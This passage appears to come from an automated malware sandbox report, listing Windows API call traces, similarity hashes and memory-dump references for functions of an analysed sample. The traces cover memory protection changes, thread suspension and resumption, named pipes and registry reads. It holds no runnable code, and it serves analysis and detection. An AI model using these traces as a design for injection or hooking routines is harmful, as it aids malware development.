    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetLastError.KERNEL32 ref: 001DE9B6
    • Part of subcall function 001DE840: GetLastError.KERNEL32(?,?,?,001DE9D7,?,00000000,?,?,00000000), ref: 001DE863
    • Part of subcall function 001DE840: GetLastError.KERNEL32(?,?,?,001DE9D7,?,00000000,?), ref: 001DE8BF
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 1
  • API ID: RtlAllocateHeap$GetLastErrorRtlInitializeCriticalSection
  • String ID:
  • API String ID: 3384439304-0
  • Opcode ID: 7a4f8abde426b5072d3d9704e13dc81ee68460d22b087ed8510a98e131e9efc7
  • Instruction ID: 80107b109b1dfd70152c12f173d035bce88304ee34fa2558259195da71fb9c3a
  • Opcode Fuzzy Hash: F2E09EF0060C41A3D00B348380803F9D58A27530E4A0E5382F6417457E5F138BA1E718
  • Instruction Fuzzy Hash: 80107b109b1dfd70152c12f173d035bce88304ee34fa2558259195da71fb9c3a
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000003,00000000), ref: 001CB7EB
  • RtlAllocateHeap.NTDLL(00000000,00000838,001E5124), ref: 001DA8C6
  • RtlInitializeCriticalSection.NTDLL(00000000), ref: 001DA8D3
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001DA91A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: HeapFreememcpy
  • String ID: ($Client
  • API String ID: 2443564160-90774469
  • Opcode ID: 4c92a37d4490a7167670f7697e6105d9cf60d964df118a6b4f918dcc470b9dca
  • Instruction ID: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
  • Opcode Fuzzy Hash: B4D02B712800C2031407A1815C313FA06B33E026DF89C6721FF64284848DD6DBE42B09
  • Instruction Fuzzy Hash: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
